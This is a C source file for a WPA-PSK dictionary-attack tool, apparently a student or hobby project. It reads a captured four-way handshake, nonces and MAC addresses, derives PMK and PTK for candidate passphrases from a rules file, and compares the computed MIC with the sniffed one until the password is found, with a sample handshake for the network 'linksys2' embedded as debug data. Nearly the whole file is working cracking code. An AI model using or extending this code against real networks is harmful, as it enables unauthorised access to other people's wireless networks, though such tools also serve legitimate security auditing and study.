#include "wpa_attack.h"

/* debugging */
u8 *pre_host_m = "0030ab209adc";
u8 *pre_ap_m = "000c41c15c85";
u8 *pre_anonce = "000000000000000000e1ffffffffffffffffffffffffffffffffffffffffffff";
u8 *pre_snonce = "15ca4b5992d8208ef572a3b0897c23f37dc403dbf6d9ac25c6f7c28cc019afc9";
u8 *pre_handshake = "000c41c15c850030ab209adc888e01030079fe01090020000000000000000015ca4b5992d8208ef572a3b0897c23f37dc403dbf6d9ac25c6f7c28cc019afc90000000000000000000000000000000000000000000000000000000000000000d0282e4c6c2b8a41158ccdd8e6f9fb66001add180050f20101000050f20201000050f20201000050f2020000";

u8 *pre_ssid = "linksys2";
/* end of debug */

// this value is used to know how long the given eapol hanshake dump is
size_t dump_len = 0;
size_t eap_body_len = 0;

char ssid[SSID_LEN];
u8 anonce[WPA_NONCE_LEN];
u8 snonce[WPA_NONCE_LEN];
u8 host_mac[ETH_ALEN];
u8 ap_mac[ETH_ALEN];
u8 handshake_dump[DUMP_LEN];
u8 test_key_mic[KEY_MIC_LEN];
u8 case_key_mic[KEY_MIC_LEN];
u8 eap_body[TMP_BUF_LEN];
size_t ssid_len = 0;
u8 pmk[PMK_LEN];
struct wpa_ptk ptk;

int NO_USER_BRUTE = TRUE; // if no user's brute force function used,
                          // else FALSE;

void wpa_hexdump(const char *title, const u8 *buf, size_t len)
{
  size_t i;
  printf("%s - hexdump(len=%d):", title, len);

  for(i = 0; i < len; i++) 
    printf(" %02x", buf[i]);

  printf("\n");
}

/**
 * This function computes the message integrity code for given key
 */
void wpa_eapol_key_mic(u8 *key, int ver, u8 *buf, size_t len, u8 *mic)
{
  hmac_md5(key, 16, buf, len, mic);
}

/**
 * This function converts pmk to ptk and stores it to *ptk
 */
void wpa_pmk_to_ptk(u8 *pmk, u8 *addr1, u8 *addr2,
			   u8 *nonce1, u8 *nonce2, u8 *ptk, size_t ptk_len)
{
	u8 data[2 * ETH_ALEN + 2 * 32];

	/* PTK = PRF-X(PMK, "Pairwise key expansion",
	 *             Min(AA, SA) || Max(AA, SA) ||
	 *             Min(ANonce, SNonce) || Max(ANonce, SNonce)) */

	if (memcmp(addr1, addr2, ETH_ALEN) < 0) {
		memcpy(data, addr1, ETH_ALEN);
		memcpy(data + ETH_ALEN, addr2, ETH_ALEN);
	} else {
		memcpy(data, addr2, ETH_ALEN);
		memcpy(data + ETH_ALEN, addr1, ETH_ALEN);
	}

	if (memcmp(nonce1, nonce2, 32) < 0) {
		memcpy(data + 2 * ETH_ALEN, nonce1, 32);
		memcpy(data + 2 * ETH_ALEN + 32, nonce2, 32);
	} else {
		memcpy(data + 2 * ETH_ALEN, nonce2, 32);
		memcpy(data + 2 * ETH_ALEN + 32, nonce1, 32);
	}

	sha1_prf(pmk, 32, "Pairwise key expansion", data, sizeof(data),
		 ptk, ptk_len);

	//	wpa_hexdump("PMK", pmk, 32);
	//	wpa_hexdump("PTK", ptk, ptk_len);
}

/**
 * This function takes in the dump (src), then rips of the
 * key_mic and replaces these parts with 0 so that the
 * dump can be used to calculate the mic 
 */
void create_hmac_buf(u8 *src, u8 *dst, u8 *case_key_mic) 
{
  int i;
  u8 *p = &(src[14]);
  memcpy(dst, p, eap_body_len);
  wpa_hexdump("HMAC DUMP: ", dst, eap_body_len);
  for(i = 0; i < 16; i++) {
    case_key_mic[i] = dst[i+81];
    dst[i+81] = 0;
  }
}

/**
 * compares the contents of two u8 up to the size of len.
 * return 0 if they are identical. otherwise, returns -1
 */
int keyncmp(u8 *test, u8 *base, int len) 
{
  int ret = 0;
  int i;

  for(i = 0; i < len; i++) {
    if(test[i] != base[i]) {
      ret = -1;
      break;
    }
  }
  
  return ret;
}
  

/**
 * converts string to hex number
 */
int str2hex(u8 *src, u8 *dst, size_t len) {

  int i, j;

  for(i = 0, j = 0; i < len; i+=2, j++) {
    char tmp[3] = {0};
    tmp[0] = src[i];
    tmp[1] = src[i+1];
    
    dst[j] = (u8) strtol(tmp, NULL, 16);
    //        printf("cycle i: %d, j: %d, num: %d\n", i, j, dst[j]);
  }

  return j;
}

/* PCL stuff */
/* This function is the core of dictionary attacking.
 * It takes in the input from phrase generator then coverts it into pmk.
 * That pmk is converted into ptk and the mic is computed.
 * Finally, the mic is compared with the mic key obtained from
 * sniffing the traffic. If they match, the program quits.
 */
int test (void)
{
  psw_chars[psw_len] = '\0';  /* before printing */

  // DEBUGGING
  if (psw_len)  printf ("%s\n", psw_chars);
    else puts ("NULL_PASSWORD");

  // create pmk
  pbkdf2_sha1(psw_chars, ssid, strlen(ssid), 4096,
		pmk, PMK_LEN);
  wpa_pmk_to_ptk(pmk, host_mac, ap_mac, anonce, snonce, (u8 *) &ptk, sizeof(ptk));
  
  // create mic from ptk.mic_key and an eap packet w/ mic key undefined
  wpa_eapol_key_mic(ptk.mic_key, KEY_TYPE, eap_body, eap_body_len, test_key_mic);
  
  if(keyncmp(test_key_mic, case_key_mic, KEY_MIC_LEN) == 0) {
    wpa_hexdump("TEST: ", test_key_mic, KEY_MIC_LEN);
    wpa_hexdump("BASE: ", case_key_mic, KEY_MIC_LEN);
    printf("password found: ");
    print_password (GET, FALSE);
    exit(0);
  }

  passwords++;
  return(1);
}

void init_brute_force()
{}

char *get_special (char *s, int16 n)
{
// let $s(1) may be "aa" or "bb"

char *special[] = { "aa", "bb"}; 

static int i = 0;

   if (n == 1) {
      if (i < 2) return (strcpy (s, special[i++]));
      else { i = 0; return (NULL); }
   }
   else yyerror ("Invalid special charset");

}

void brute_force (int len, char *charset) {
// must fill only if NO_USER_BRUTE == FALSE
}


void definition_done()
{

/* test_definition() prints defined charsets and tests
   defined convert strings */

 test_definition();
}




int main() {

  // set up vars
  char passphrase[PASSPHRASE_LEN];
  u8 tmp_buf[TMP_BUF_LEN];
  

  // init vars
  memset(passphrase, 0, PASSPHRASE_LEN);
  memset(ssid, 0, SSID_LEN);
  memset(anonce, 0, WPA_NONCE_LEN);
  memset(snonce, 0, WPA_NONCE_LEN);
  memset(host_mac, 0, ETH_ALEN);
  memset(ap_mac, 0, ETH_ALEN);
  memset(test_key_mic, 0, KEY_MIC_LEN);
  memset(case_key_mic, 0, KEY_MIC_LEN);
  memset(pmk, 0, PMK_LEN);
  memset(tmp_buf, 0, TMP_BUF_LEN);
  memset(handshake_dump, 0, DUMP_LEN);
  memset(&ptk, 0, sizeof(ptk));
  memset(eap_body, 0, TMP_BUF_LEN);

  //ask for ssid
  #ifndef DEBUG
  printf("Enter the SSID: ");
  scanf("%s", ssid);
  #else
  memcpy(ssid, pre_ssid, strlen(pre_ssid));
  #endif
  ssid_len = strlen(ssid);

  //ask for anonce
  #ifndef DEBUG
  printf("Enter ANONCE: ");
  scanf("%s", tmp_buf);
  #else
  memcpy(tmp_buf, pre_anonce, WPA_NONCE_LEN * 2);
  #endif
  str2hex(tmp_buf, anonce, WPA_NONCE_LEN * 2);
  //  wpa_hexdump("ANONCE: ", anonce, WPA_NONCE_LEN);

  //ask for snonce
  #ifndef DEBUG
  printf("Enter SNONCE: ");
  scanf("%s", tmp_buf);
  #else
  memcpy(tmp_buf, pre_snonce, WPA_NONCE_LEN * 2);
  #endif
  str2hex(tmp_buf, snonce, WPA_NONCE_LEN * 2);
  //  wpa_hexdump("SNONCE: ", snonce, WPA_NONCE_LEN);

  //ask for host mac address
  #ifndef DEBUG
  printf("Enter host mac address: ");
  scanf("%s", tmp_buf);
  #else
  memcpy(tmp_buf, pre_host_m, MAC_LEN * 2);
  #endif
  str2hex(tmp_buf, host_mac, MAC_LEN * 2);

  //ask for AP mac address
  #ifndef DEBUG
  printf("Enter Access Point mac address: ");
  scanf("%s", tmp_buf);
  #else
  memcpy(tmp_buf, pre_ap_m, MAC_LEN * 2);
  #endif
  str2hex(tmp_buf, ap_mac, MAC_LEN * 2);
  //  wpa_hexdump("APMAC: ", ap_mac, MAC_LEN);

  //ask for handshake dump
  #ifndef DEBUG
  printf("Enter the handshake dump collected: ");
  scanf("%s", tmp_buf);
  #else
  memcpy(tmp_buf, pre_handshake, HANDSHAKE_LEN * 2);
  #endif
  dump_len = strlen(tmp_buf) / 2;
  eap_body_len = dump_len - 14;
  str2hex(tmp_buf, handshake_dump, HANDSHAKE_LEN * 2);
  //  wpa_hexdump("HANDSHAKE: ", handshake_dump, dump_len);

  //create a data which is used in hmac
  create_hmac_buf(handshake_dump, eap_body, case_key_mic);

  // start dic attack here!
  parse_rules_file ("password.def", 8, 15);


  return 0;
}
